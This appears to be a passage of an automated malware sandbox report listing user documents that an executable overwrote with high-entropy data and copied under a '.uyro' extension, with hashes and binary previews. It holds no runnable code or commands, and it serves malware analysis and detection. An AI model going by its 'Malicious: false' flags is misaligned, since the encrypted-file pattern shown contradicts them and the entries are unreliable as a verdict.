SHA1:	BF4E4F891175EBDED95CFBACCCEDEA0CB9DDD533
SHA-256:	F973AF594B257C0BCDC6880A090A2D9CAB2EA01D8689DBE864EF3F387D7772C5
SHA-512:	F7FE098F3089A0447A552FF06A52411B7A999496FBD774A5F08E1BA2CB4D2E563C940DB317439B912633D7018615EB4923721EBE11BF8F5BC00BCDCFAC7149E5
Malicious:	false
Reputation:	unknown
Preview:	KZWFN.^j...g....r.1.}.\...}Z.[}....M_..9.........uM?M:......;.... ;.8...I>.....:$..$......n...7.O./..".;[.H.Te..\|.R.o.....t!&.Y..\O.s.........I.I..EY@...............E.D...NY...4..u.z.Er...o...X.l.8...W<G/.x(....*...2.=y.]...V.....w..W..X....T.W6..n..... _$......A.8...:KB...=...O]{b..m>V...-...>...............fx..`p...o?V.0.u...M..9.{...&l].......y..&.V...K.).F... .!.XW...v.."...L..'.g.j...}.fQa..V..73..8...;)..]...~...r.y`.^i}.V....q..-...liF....]../.^...As~tM.eF.(.e......r.b.a......._....zK....s...,............K.W.PWv,.>....dJ..9.k-.T..5.j...H...G.=..+N...Na%q.....=....^.'....Iy..l.c..U=....Q..5=X.V...^.Gs.,K.....G`g.........I.P.....Q..6U..,l..}P...Q.....O..+CJ.e/......>...B6x=H....o..E.J.Y.......O..R..]7..........dp..0...@....I8.$..j......X7?... A.L.H..0.my-.o0...W.......].,.Ng.InZ.....[K9.!>........C...y.....8.......X.Z....W..a.......].........I....L.EL.:~f....j._..fV.gk...3.+"K...~g&.C.1...O..h..q....>..\F..{..z.hs........3W&

C:\Users\user\Documents\LTKMYBSEYZ\KZWFNRXYKI.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856528994696251
Encrypted:	false
SSDEEP:	24:0fFSS46zXNBQao9ZEFkUbWUoDhrYOOVUmLgPLgR6x2ucKD9ubD:1f0abSkUbWUaSV5YxrhJMD
MD5:	4B048357BD819BEB6470F00B15A385EF
SHA1:	BF4E4F891175EBDED95CFBACCCEDEA0CB9DDD533
SHA-256:	F973AF594B257C0BCDC6880A090A2D9CAB2EA01D8689DBE864EF3F387D7772C5
SHA-512:	F7FE098F3089A0447A552FF06A52411B7A999496FBD774A5F08E1BA2CB4D2E563C940DB317439B912633D7018615EB4923721EBE11BF8F5BC00BCDCFAC7149E5
Malicious:	false
Reputation:	unknown
Preview:	KZWFN.^j...g....r.1.}.\...}Z.[}....M_..9.........uM?M:......;.... ;.8...I>.....:$..$......n...7.O./..".;[.H.Te..\|.R.o.....t!&.Y..\O.s.........I.I..EY@...............E.D...NY...4..u.z.Er...o...X.l.8...W<G/.x(....*...2.=y.]...V.....w..W..X....T.W6..n..... _$......A.8...:KB...=...O]{b..m>V...-...>...............fx..`p...o?V.0.u...M..9.{...&l].......y..&.V...K.).F... .!.XW...v.."...L..'.g.j...}.fQa..V..73..8...;)..]...~...r.y`.^i}.V....q..-...liF....]../.^...As~tM.eF.(.e......r.b.a......._....zK....s...,............K.W.PWv,.>....dJ..9.k-.T..5.j...H...G.=..+N...Na%q.....=....^.'....Iy..l.c..U=....Q..5=X.V...^.Gs.,K.....G`g.........I.P.....Q..6U..,l..}P...Q.....O..+CJ.e/......>...B6x=H....o..E.J.Y.......O..R..]7..........dp..0...@....I8.$..j......X7?... A.L.H..0.my-.o0...W.......].,.Ng.InZ.....[K9.!>........C...y.....8.......X.Z....W..a.......].........I....L.EL.:~f....j._..fV.gk...3.+"K...~g&.C.1...O..h..q....>..\F..{..z.hs........3W&

C:\Users\user\Documents\LTKMYBSEYZ\LTKMYBSEYZ.docx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.823481642218606
Encrypted:	false
SSDEEP:	24:/knFcNp8oR2FmXGaSz+ZIvXnfmAfC2hHbgX6lCjAybD:/wFcNpz2FxaSzsIvXss7nsjFD
MD5:	B85FAE163C517226A3967145B73640B0
SHA1:	F52E576D0C37221A178DD95291E7914CD578E63D
SHA-256:	C8F61B3A78E60AB27A5BFBE03174020AE9D31003705F0FFE6C8B817B2D8BC800
SHA-512:	D18C4346C14E07D4302EBAECFF691CCBF50088B52DD2ECD1819A52A11454968D5F37C6AF991A3CC4BFB8885F4959F5892588DB1E5B254A0428353BA73F9AD37C
Malicious:	false
Reputation:	unknown
Preview:	LTKMY>$z.......T......m..:.~..Z.WB.w.pk_.....B..9....3.h.5.o%...'......?.N.7..-.............Y..)......?.ZT.0n .......p....>..9..M...^.c....B..q..NQ.H..5........l.<.G.I...6J..7v..o7m..1..v..p...9.h..M....:{......^O..7..a.bx...j..k-s....I...C... V.\:.....a9.5..a ... ].......C,3.. u..3.....3Y...i1.8..u..q.1..[...@..&iH..`_.y..\|...>OG...=..K........V...344.....(..2t..r....l..T......^.3=.F..\...1\|.......?..{..6.}v.5...z}.k.W.U.....L...'.....g....7.....+..nlL..l.)......3X...f\Z.V.....5.s..;....?..@..v..a\|..}..x.}....J....c7...8O..{..........Y.;.X....R0.nbT.z`..\"m.(.....>.K.B,fA6..P.I...h.g.v.a_..N......8..{...2.U.....JIE5. /S.o...bc.....b>#...0k}.A..M.i,.b-6A ...+..Q......_.T.....:t..{......MG]D.z.t^..9RY.,...wG..jv 4..V.evFqx....M..0..a.C.M6..c...'.#.e-..lMI'....~,..%.6......D....B:.b:X.z5....[........:..l..iA=....y}5E.f..q..j5..w..9.t.&L...$w..!.?..!.Q5...G...........(.i./.(...u. YM.V4/..E.d..~..0.r.3..V..=?.`?.7GC...~"..hE..5s<?#a

C:\Users\user\Documents\LTKMYBSEYZ\LTKMYBSEYZ.docx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.823481642218606
Encrypted:	false
SSDEEP:	24:/knFcNp8oR2FmXGaSz+ZIvXnfmAfC2hHbgX6lCjAybD:/wFcNpz2FxaSzsIvXss7nsjFD
MD5:	B85FAE163C517226A3967145B73640B0
SHA1:	F52E576D0C37221A178DD95291E7914CD578E63D
SHA-256:	C8F61B3A78E60AB27A5BFBE03174020AE9D31003705F0FFE6C8B817B2D8BC800
SHA-512:	D18C4346C14E07D4302EBAECFF691CCBF50088B52DD2ECD1819A52A11454968D5F37C6AF991A3CC4BFB8885F4959F5892588DB1E5B254A0428353BA73F9AD37C
Malicious:	false
Reputation:	unknown
Preview:	LTKMY>$z.......T......m..:.~..Z.WB.w.pk_.....B..9....3.h.5.o%...'......?.N.7..-.............Y..)......?.ZT.0n .......p....>..9..M...^.c....B..q..NQ.H..5........l.<.G.I...6J..7v..o7m..1..v..p...9.h..M....:{......^O..7..a.bx...j..k-s....I...C... V.\:.....a9.5..a ... ].......C,3.. u..3.....3Y...i1.8..u..q.1..[...@..&iH..`_.y..\|...>OG...=..K........V...344.....(..2t..r....l..T......^.3=.F..\...1\|.......?..{..6.}v.5...z}.k.W.U.....L...'.....g....7.....+..nlL..l.)......3X...f\Z.V.....5.s..;....?..@..v..a\|..}..x.}....J....c7...8O..{..........Y.;.X....R0.nbT.z`..\"m.(.....>.K.B,fA6..P.I...h.g.v.a_..N......8..{...2.U.....JIE5. /S.o...bc.....b>#...0k}.A..M.i,.b-6A ...+..Q......_.T.....:t..{......MG]D.z.t^..9RY.,...wG..jv 4..V.evFqx....M..0..a.C.M6..c...'.#.e-..lMI'....~,..%.6......D....B:.b:X.z5....[........:..l..iA=....y}5E.f..q..j5..w..9.t.&L...$w..!.?..!.Q5...G...........(.i./.(...u. YM.V4/..E.d..~..0.r.3..V..=?.`?.7GC...~"..hE..5s<?#a

C:\Users\user\Documents\LTKMYBSEYZ\NWTVCDUMOB.xlsx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.842719557942764
Encrypted:	false
SSDEEP:	24:ofXLidsjRBgmidglpfNSOG730InKlfDIW5G3xM+75siRsq0c/bD:ofXLlD2+SH7nKh0WuHts3WD
MD5:	4A5EF63B50CEA331167FD90CA4963971
SHA1:	4750140FF44D46DDC8702210B40D1B7CBA277295
SHA-256:	8360434D45A8102D77854F60D8579954A42C1D08877A38C66744502465AFB865
SHA-512:	943CB2A016DAE55B920ED69564283CD7DD25D6D36CF4A1962B2343CB4F5AB3050F129929C70702361742553D87CC51E0A89D55F65089830CAF57E820A66BB0B5
Malicious:	false
Reputation:	unknown
Preview:	NWTVC.Y-(.l..@...^7.......!.b\N{.....1.b..\|#2R.fa\...%>cE..y..+%......H....kmQ\|.;.~>V.x...[5.]..\|.[%O.'..Q.....\Y.gJ}!.g;.u4.U.;!....?.I..l...s.2.3D..:.].....(0...W.>4....~7Nb......r...A..~.\|...i6:.......j.&T..L.!D....p&.4..{D........B...2.%..V...L..<]..........W2CL.@f.Eq<a.......".gU.`N...h....,.<1\.W.x.^u......^..F>9k.*...a..1.7Ox..5.Z.}....F....r...S..........WR.+=.-.o.$I..P_....&........x.E..[.L...5...R......l...s:..O..n......z^..Y.3....k.C.L.........B,....Q.._..Q/WF.5..0.q..{.9..SN.0....;04...@> /#.m..D.1..lz=.....%.j.@K#.y=..<.....2.5.(...\|SdD....P...3x..p.%..5..... >1\I--...a.lj............&._..'...Bq.N.u..}.F81....m.Z.-U..g........J...{Q(6.W.7F...p.0[..;..=.......J!..!.(4........w</m./.]....c&..%w{..?.=..a...h...@VZc....._.'VK>l.A..D..U-Z.3D.L...b}~..j.....A.%i.\|].......G'.iLK..j.b..-...E.......i...Qa.W..........%....5.y....=....?..h3.x....C.M...).1.R[.&....]S(<_.B.......\.T......{...../....y...._....2.2..CX...#..

C:\Users\user\Documents\LTKMYBSEYZ\NWTVCDUMOB.xlsx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.842719557942764
Encrypted:	false
SSDEEP:	24:ofXLidsjRBgmidglpfNSOG730InKlfDIW5G3xM+75siRsq0c/bD:ofXLlD2+SH7nKh0WuHts3WD
MD5:	4A5EF63B50CEA331167FD90CA4963971
SHA1:	4750140FF44D46DDC8702210B40D1B7CBA277295
SHA-256:	8360434D45A8102D77854F60D8579954A42C1D08877A38C66744502465AFB865
SHA-512:	943CB2A016DAE55B920ED69564283CD7DD25D6D36CF4A1962B2343CB4F5AB3050F129929C70702361742553D87CC51E0A89D55F65089830CAF57E820A66BB0B5
Malicious:	false
Reputation:	unknown
Preview:	NWTVC.Y-(.l..@...^7.......!.b\N{.....1.b..\|#2R.fa\...%>cE..y..+%......H....kmQ\|.;.~>V.x...[5.]..\|.[%O.'..Q.....\Y.gJ}!.g;.u4.U.;!....?.I..l...s.2.3D..:.].....(0...W.>4....~7Nb......r...A..~.\|...i6:.......j.&T..L.!D....p&.4..{D........B...2.%..V...L..<]..........W2CL.@f.Eq<a.......".gU.`N...h....,.<1\.W.x.^u......^..F>9k.*...a..1.7Ox..5.Z.}....F....r...S..........WR.+=.-.o.$I..P_....&........x.E..[.L...5...R......l...s:..O..n......z^..Y.3....k.C.L.........B,....Q.._..Q/WF.5..0.q..{.9..SN.0....;04...@> /#.m..D.1..lz=.....%.j.@K#.y=..<.....2.5.(...\|SdD....P...3x..p.%..5..... >1\I--...a.lj............&._..'...Bq.N.u..}.F81....m.Z.-U..g........J...{Q(6.W.7F...p.0[..;..=.......J!..!.(4........w</m./.]....c&..%w{..?.=..a...h...@VZc....._.'VK>l.A..D..U-Z.3D.L...b}~..j.....A.%i.\|].......G'.iLK..j.b..-...E.......i...Qa.W..........%....5.y....=....?..h3.x....C.M...).1.R[.&....]S(<_.B.......\.T......{...../....y...._....2.2..CX...#..

C:\Users\user\Documents\LTKMYBSEYZ\WUTJSCBCFX.pdf

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.861640832421234
Encrypted:	false
SSDEEP:	24:9D4uQFhOUR53KhpwhrJbTY7aJEBj6Hd4kTKOR2qFW+wEPIwcq41SjKMRNfKi23bD:V/Y3Kh+rJbM7aJXdrTKGpFhP8q41SeME
MD5:	1406B100A1BB45CE0A1ED2318C35275B
SHA1:	314AF72FFB6218F97130A3064C82B9D55B886425
SHA-256:	1DDDFC694D0E27044B742A97CE6D0F4DA0445CEB5BAD40D2387FB229E83A5655
SHA-512:	ACE9DCE039B29859294BE78581B3D38A9DB4DB221503B4A2B936E74215575822336A4A49E147D52E97E1048DE86BCEE3A7D3A2A6A7CFF57C1E726FE186343804
Malicious:	false
Reputation:	unknown
Preview:	WUTJS...u/.$d8n...^]..k.....?.O\..1.lM..4..1.....&..Ip2..j.b..S.....ox.#...t.......o....hS...ea.G.(..DV.Q5bH~.(;..D..x...8.. $.b.....9......_...>h......qi..0#x~.q..\.u.M....K.4...j..1.jW..'....x.0 pJ[.lp..p.!..q.XW..8}...%...&.....q...d...V14...^W..+.r.Q.F.g..r.o.z.68A..\|...X...!...p.,A.).!.....U......\|...Q..G.....w.]...C^...9=.\|....G...)_t......l.&Y.5{..P..$dv..;.;VSK..x-.....y..c?...~...O.u_D...q.....y..!#3..8B!.s.1,S..~..O......9w..?.$N..Vc........5`..)c.9.%..U....O,....u..L.x.3./.~...3.\..kx...1....[...;~.2.....\..'3..$.@.8.-t}5..7`..13v.uK.(.. .;:e5..k..TN...N&..h....~....p?H.F.,..@..1bA.A.........2.5.8..}e.F.}h.S.Z.4X{.........1...<.g.......i7(".:g..W .#..,U...S..z]$......7.}...C`.JT..4.F@5...}..mt....n.gIv.c:. ..I....9Y./gW.._u..9T..(.I...a.>.dj.1......1.\|..Xg....u.`.PWu)..`$?.t......k.J}9Uo..J..Ro.:...X.@.u...Q..P.'..A..{.*...]..^...#..O..z9...D..s.cS&o..H.k.....U.Z...z.NQ...B.....G7.n.1^.. ..e...\|..7s......VK&.......<'.c.Rt....p.5

C:\Users\user\Documents\LTKMYBSEYZ\WUTJSCBCFX.pdf.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.861640832421234
Encrypted:	false
SSDEEP:	24:9D4uQFhOUR53KhpwhrJbTY7aJEBj6Hd4kTKOR2qFW+wEPIwcq41SjKMRNfKi23bD:V/Y3Kh+rJbM7aJXdrTKGpFhP8q41SeME
MD5:	1406B100A1BB45CE0A1ED2318C35275B
SHA1:	314AF72FFB6218F97130A3064C82B9D55B886425
SHA-256:	1DDDFC694D0E27044B742A97CE6D0F4DA0445CEB5BAD40D2387FB229E83A5655
SHA-512:	ACE9DCE039B29859294BE78581B3D38A9DB4DB221503B4A2B936E74215575822336A4A49E147D52E97E1048DE86BCEE3A7D3A2A6A7CFF57C1E726FE186343804
Malicious:	false
Reputation:	unknown
Preview:	WUTJS...u/.$d8n...^]..k.....?.O\..1.lM..4..1.....&..Ip2..j.b..S.....ox.#...t.......o....hS...ea.G.(..DV.Q5bH~.(;..D..x...8.. $.b.....9......_...>h......qi..0#x~.q..\.u.M....K.4...j..1.jW..'....x.0 pJ[.lp..p.!..q.XW..8}...%...&.....q...d...V14...^W..+.r.Q.F.g..r.o.z.68A..\|...X...!...p.,A.).!.....U......\|...Q..G.....w.]...C^...9=.\|....G...)_t......l.&Y.5{..P..$dv..;.;VSK..x-.....y..c?...~...O.u_D...q.....y..!#3..8B!.s.1,S..~..O......9w..?.$N..Vc........5`..)c.9.%..U....O,....u..L.x.3./.~...3.\..kx...1....[...;~.2.....\..'3..$.@.8.-t}5..7`..13v.uK.(.. .;:e5..k..TN...N&..h....~....p?H.F.,..@..1bA.A.........2.5.8..}e.F.}h.S.Z.4X{.........1...<.g.......i7(".:g..W .#..,U...S..z]$......7.}...C`.JT..4.F@5...}..mt....n.gIv.c:. ..I....9Y./gW.._u..9T..(.I...a.>.dj.1......1.\|..Xg....u.`.PWu)..`$?.t......k.J}9Uo..J..Ro.:...X.@.u...Q..P.'..A..{.*...]..^...#..O..z9...D..s.cS&o..H.k.....U.Z...z.NQ...B.....G7.n.1^.. ..e...\|..7s......VK&.......<'.c.Rt....p.5

C:\Users\user\Documents\LTKMYBSEYZ\YPSIACHYXW.jpg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8626129792719865
Encrypted:	false
SSDEEP:	24:1Ra83dqRY6OkUOTSad/xhQ2pPTUj0YTYhPfC2w2q2U/2488gEARVdNebD:14A4O9OTxLQk7Uj0+YhPqwqPu4MEsdNY
MD5:	DD224AD42837680A13728EAF2D94C0B0
SHA1:	3D6756483A23507362ACCBB1BA054FDADD0E32EC
SHA-256:	B0464AABBFFD9EAA96319E20D8EAF3B43E4E5236D0B65DCB2CCE05FF8500D5CE
SHA-512:	6DFE670DF431F8BD53EDAF562F182C22A2F270D502DC57DC9D8BE955898BB4B243BA118D7DA13B37DB05A59714FF32C4831D1727B636093DF51BFB237087660A
Malicious:	false
Reputation:	unknown
Preview:	YPSIAD.....)X{&V......'_..m...f.AN.,..E?.W..EW.#..\|..xf.UeX.]..!.i.....u...4..c.t...s.a............-{5....j..w...J\|......g)D.vI..aG..o,.I....6.C,}[.Ku9..aY.CU!ia(..e^.VE....0.....a....i.fw.I=.).bj....bi9]C...`.6D...y..eKQB.0.....@....h).)..A.(.qO.M.........H..6..F.N.5.u..g...G./.7Q.c.Q.8U.r..M..=T..e^-f.._..Z.4'....6.w.......L..sS.Y..>:~c...........Z)..9....L.w..2o....e.n8.J..J..\|.>..7..5.....p..t.. ..Z.x~......v..{.<.....U..Gnj..3z.@us..$Y....).q.q.1:.%.....'..cb.y...RW@...Sk....}...8..a...R....I"...k....i.b1...J.D.a...Cl.............l!.._...%W..j.0.I.....V.J.-.......WN...........Q}.X..A._..)...;9z.OV...D.."...d.$-......>.!X .Y...2..R..8.%....`.L....m!..2......rnOD.6..f0.....`.......\|.l..b$sq..ERp.S7.q..m.qC..... ..{...O.M........'o..;F.>...x6S%.z../........[..ok....D..f....Y.....H.lF.B.].@..i#...da._i...sb..j\|8..2:.=..Ct.....K]h.."....p..m..-..wC....R.k'....+0..#-#Sb.la.z...E........\F.....Rc. ..VT.Q.......9.f........_x...Z.,..Y.q..jl

C:\Users\user\Documents\LTKMYBSEYZ\YPSIACHYXW.jpg.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8626129792719865
Encrypted:	false
SSDEEP:	24:1Ra83dqRY6OkUOTSad/xhQ2pPTUj0YTYhPfC2w2q2U/2488gEARVdNebD:14A4O9OTxLQk7Uj0+YhPqwqPu4MEsdNY
MD5:	DD224AD42837680A13728EAF2D94C0B0
SHA1:	3D6756483A23507362ACCBB1BA054FDADD0E32EC
SHA-256:	B0464AABBFFD9EAA96319E20D8EAF3B43E4E5236D0B65DCB2CCE05FF8500D5CE
SHA-512:	6DFE670DF431F8BD53EDAF562F182C22A2F270D502DC57DC9D8BE955898BB4B243BA118D7DA13B37DB05A59714FF32C4831D1727B636093DF51BFB237087660A
Malicious:	false
Reputation:	unknown
Preview:	YPSIAD.....)X{&V......'_..m...f.AN.,..E?.W..EW.#..\|..xf.UeX.]..!.i.....u...4..c.t...s.a............-{5....j..w...J\|......g)D.vI..aG..o,.I....6.C,}[.Ku9..aY.CU!ia(..e^.VE....0.....a....i.fw.I=.).bj....bi9]C...`.6D...y..eKQB.0.....@....h).)..A.(.qO.M.........H..6..F.N.5.u..g...G./.7Q.c.Q.8U.r..M..=T..e^-f.._..Z.4'....6.w.......L..sS.Y..>:~c...........Z)..9....L.w..2o....e.n8.J..J..\|.>..7..5.....p..t.. ..Z.x~......v..{.<.....U..Gnj..3z.@us..$Y....).q.q.1:.%.....'..cb.y...RW@...Sk....}...8..a...R....I"...k....i.b1...J.D.a...Cl.............l!.._...%W..j.0.I.....V.J.-.......WN...........Q}.X..A._..)...;9z.OV...D.."...d.$-......>.!X .Y...2..R..8.%....`.L....m!..2......rnOD.6..f0.....`.......\|.l..b$sq..ERp.S7.q..m.qC..... ..{...O.M........'o..;F.>...x6S%.z../........[..ok....D..f....Y.....H.lF.B.].@..i#...da._i...sb..j\|8..2:.=..Ct.....K]h.."....p..m..-..wC....R.k'....+0..#-#Sb.la.z...E........\F.....Rc. ..VT.Q.......9.f........_x...Z.,..Y.q..jl

C:\Users\user\Documents\NEBFQQYWPS.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.862577895534226
Encrypted:	false
SSDEEP:	24:rsle+emjpAtAT0lSKevEVKNMrO00XUT5YCCJZSbGBf4JFKtwSOs7CSjH7bD:0N5AtAAlfG0RNYR/SaSJwqls7CST/D
MD5:	BE069A30A74FF128328173605D698BAD
SHA1:	644F2CC9122B8DB022C7762A2743500D66F82968
SHA-256:	6C794DB044D262DCA8E26F72D883EFEFD6C07767007CE318BA1134A6D1CDE7F8
SHA-512:	CBD08BDC40ACF03B4ABB7E495AF38BF418E65A595950099DFE8F01E9C4C0324D1EB81CC30028C32B049C12D6ECBE77610D315E28D1A787A2389847F6DB4FAC75
Malicious:	false
Reputation:	unknown
Preview:	NEBFQ<D..Q.....7.KYH..~.@.......ghn.M...r.-.-..h-.^.3.Ky..V..s..Y?.....gtrN.-q>...S......R\P..3&.y!..Je..d.'&.^...s.LH....g{B>.)....U..ZGU4.T..9.p......b'....f}Q.~%./....u...w"...{....t..q....f..........".......s>.l2..3.V......_.....Nh..5.Vn.M..\2..M.=....c.+.".s......fZJyi^0S.\|L.a.l.....h..P/...,.z....u...s..J:.p~3....S....,.[..@...\|...`.......!9D......%..6....PHm-1.eR...^....%Tb..t.....p.Z.X..d.W...7&\a..G.SAO.G.2oep.\.............>ue.6......~d.......f..Y.n.....bP...x.o....<..mL......m...`x9.....O..?.....U.....[..J...H..^.E.9...3..Vv...j!.vG...I.d...\|...u.T..MxEl.L;.m.i.:.....l..@.;....*.%G....=G.ZoL.......}:.....6x.P....=.....b...l.i&[VSV.o......s.6.".pO_.=...^.K..>w.......F.).> .y=1-\....N............Ie...h.Q.)...9...........4..m.WJ.N.U(r.b.9'...k^0..mPo......fPQkgp.ke..3M%}..3?o.7.s...!..g..h...(;.n.p)...u..{A..u..EL..Xh..O.(..^........2..G..(F....PxJ./D...(.......2w.[-...64...<O.....TGf.Y.A;.K'.}..tSh.8`...%mm..

C:\Users\user\Documents\NEBFQQYWPS.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.862577895534226
Encrypted:	false
SSDEEP:	24:rsle+emjpAtAT0lSKevEVKNMrO00XUT5YCCJZSbGBf4JFKtwSOs7CSjH7bD:0N5AtAAlfG0RNYR/SaSJwqls7CST/D
MD5:	BE069A30A74FF128328173605D698BAD
SHA1:	644F2CC9122B8DB022C7762A2743500D66F82968
SHA-256:	6C794DB044D262DCA8E26F72D883EFEFD6C07767007CE318BA1134A6D1CDE7F8
SHA-512:	CBD08BDC40ACF03B4ABB7E495AF38BF418E65A595950099DFE8F01E9C4C0324D1EB81CC30028C32B049C12D6ECBE77610D315E28D1A787A2389847F6DB4FAC75
Malicious:	false
Reputation:	unknown
Preview:	NEBFQ<D..Q.....7.KYH..~.@.......ghn.M...r.-.-..h-.^.3.Ky..V..s..Y?.....gtrN.-q>...S......R\P..3&.y!..Je..d.'&.^...s.LH....g{B>.)....U..ZGU4.T..9.p......b'....f}Q.~%./....u...w"...{....t..q....f..........".......s>.l2..3.V......_.....Nh..5.Vn.M..\2..M.=....c.+.".s......fZJyi^0S.\|L.a.l.....h..P/...,.z....u...s..J:.p~3....S....,.[..@...\|...`.......!9D......%..6....PHm-1.eR...^....%Tb..t.....p.Z.X..d.W...7&\a..G.SAO.G.2oep.\.............>ue.6......~d.......f..Y.n.....bP...x.o....<..mL......m...`x9.....O..?.....U.....[..J...H..^.E.9...3..Vv...j!.vG...I.d...\|...u.T..MxEl.L;.m.i.:.....l..@.;....*.%G....=G.ZoL.......}:.....6x.P....=.....b...l.i&[VSV.o......s.6.".pO_.=...^.K..>w.......F.).> .y=1-\....N............Ie...h.Q.)...9...........4..m.WJ.N.U(r.b.9'...k^0..mPo......fPQkgp.ke..3M%}..3?o.7.s...!..g..h...(;.n.p)...u..{A..u..EL..Xh..O.(..^........2..G..(F....PxJ./D...(.......2w.[-...64...<O.....TGf.Y.A;.K'.}..tSh.8`...%mm..

C:\Users\user\Documents\NWTVCDUMOB.xlsx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851519929047541
Encrypted:	false
SSDEEP:	24:MlBPYABNX8xmJBoV5egugxw/muqcV9Tfuyyu+Sw6AUEiz1Y3LstazibNe2tfzh/x:yVBCxSBngNxweuzjdyulvAMZAfiVtfzf
MD5:	FFC72A0F1C2F168B8B9354DD94E17A14
SHA1:	2BA144D54503115FF12CA373F5D36513DCF62841
SHA-256:	057ED339A09EF060E2E349D1D944657A8CAB5C8567CCAC2CFE901108AC2C1DAD
SHA-512:	54B334E6BB8C1AF8A434857FD9B5F34A1CBC9F75AE2821C194AA3C8F0E818368F08B19D23A3824E8343D90AFAB10C63F5731921CA5787EBBC870A470F811F234
Malicious:	false
Reputation:	unknown
Preview:	NWTVC~.$H.z..\G.....0....}t....s....-l.v....SgsHc.0..U......}:......V.3R.GD_S..m.`.~+[..9.R.." .i.....}....d.h..\|.......b....D...3.......]3....P.u....5... "..!.y./..U.$j/.F..,Q=s#X......7.JWKS...q...7./.....(.<.0....i........F....:.......1ec0.(M%&. ....'.S.X.h.....Z..c....X`.....#../.&`..}.s...#4.J....(..W..dF.E4.O.`.uk.}we<.7.N.....7.8.....A...2..F.;...>....\......m.N.9Y6b....;5Hh.:..5`!...Q.....fG1..`%1.\M..........G.l.>T..I.y..^;..,.....@"Z.r..(.)g..W.za..Xs.?.r..v.#.].&:.o..y.[#}.v..b.A.\.na.....".+.f..'...p..b..h.....fT....P..o.t..X.>2.a?.(....8e.O.#..)..6.c.(p~..Hg.._/La..}..B..O.TH>],..`V.v#x7.h=...Qn.{=..$.s..)x$.P....,....N.0..t@.+..'....&.OQ./3rT....1!...............i....../...A..cn.C.^.X..^......O@A..F9.......e.3...fF....\%A.:a....&..O.....0..:r _=.<S'...4..#.rj.f.... .......O.B..........#e.......t.Z.Y.g..lr...U..J...Oo.=..R..Bk..2.r...@E.$y..mS.a........,..Z.g... ..%......Q..#...E..oK...F.{7v..;....W..*B....r...Z....:h.X.S

C:\Users\user\Documents\NWTVCDUMOB.xlsx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851519929047541
Encrypted:	false
SSDEEP:	24:MlBPYABNX8xmJBoV5egugxw/muqcV9Tfuyyu+Sw6AUEiz1Y3LstazibNe2tfzh/x:yVBCxSBngNxweuzjdyulvAMZAfiVtfzf
MD5:	FFC72A0F1C2F168B8B9354DD94E17A14
SHA1:	2BA144D54503115FF12CA373F5D36513DCF62841
SHA-256:	057ED339A09EF060E2E349D1D944657A8CAB5C8567CCAC2CFE901108AC2C1DAD
SHA-512:	54B334E6BB8C1AF8A434857FD9B5F34A1CBC9F75AE2821C194AA3C8F0E818368F08B19D23A3824E8343D90AFAB10C63F5731921CA5787EBBC870A470F811F234
Malicious:	false
Reputation:	unknown
Preview:	NWTVC~.$H.z..\G.....0....}t....s....-l.v....SgsHc.0..U......}:......V.3R.GD_S..m.`.~+[..9.R.." .i.....}....d.h..\|.......b....D...3.......]3....P.u....5... "..!.y./..U.$j/.F..,Q=s#X......7.JWKS...q...7./.....(.<.0....i........F....:.......1ec0.(M%&. ....'.S.X.h.....Z..c....X`.....#../.&`..}.s...#4.J....(..W..dF.E4.O.`.uk.}we<.7.N.....7.8.....A...2..F.;...>....\......m.N.9Y6b....;5Hh.:..5`!...Q.....fG1..`%1.\M..........G.l.>T..I.y..^;..,.....@"Z.r..(.)g..W.za..Xs.?.r..v.#.].&:.o..y.[#}.v..b.A.\.na.....".+.f..'...p..b..h.....fT....P..o.t..X.>2.a?.(....8e.O.#..)..6.c.(p~..Hg.._/La..}..B..O.TH>],..`V.v#x7.h=...Qn.{=..$.s..)x$.P....,....N.0..t@.+..'....&.OQ./3rT....1!...............i....../...A..cn.C.^.X..^......O@A..F9.......e.3...fF....\%A.:a....&..O.....0..:r _=.<S'...4..#.rj.f.... .......O.B..........#e.......t.Z.Y.g..lr...U..J...Oo.=..R..Bk..2.r...@E.$y..mS.a........,..Z.g... ..%......Q..#...E..oK...F.{7v..;....W..*B....r...Z....:h.X.S

C:\Users\user\Documents\QNCYCDFIJJ.mp3

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846691353210032
Encrypted:	false
SSDEEP:	24:alO8/PcWq0ccD3qO5xeCEuSGAHq3T4oBVinjlZCp1SR1XajybD:aA88Wq7crS3HqqlSiogD
MD5:	7A075BADBF20B62F5DBC0A7BE96D7765
SHA1:	4B84E4B5EA5F46A1A1C8B5893368C14A7F38D292
SHA-256:	1660F21C163B69C140C213201C4C9D7F3E94FF8BAD42BBECFEE79A740DCF353C
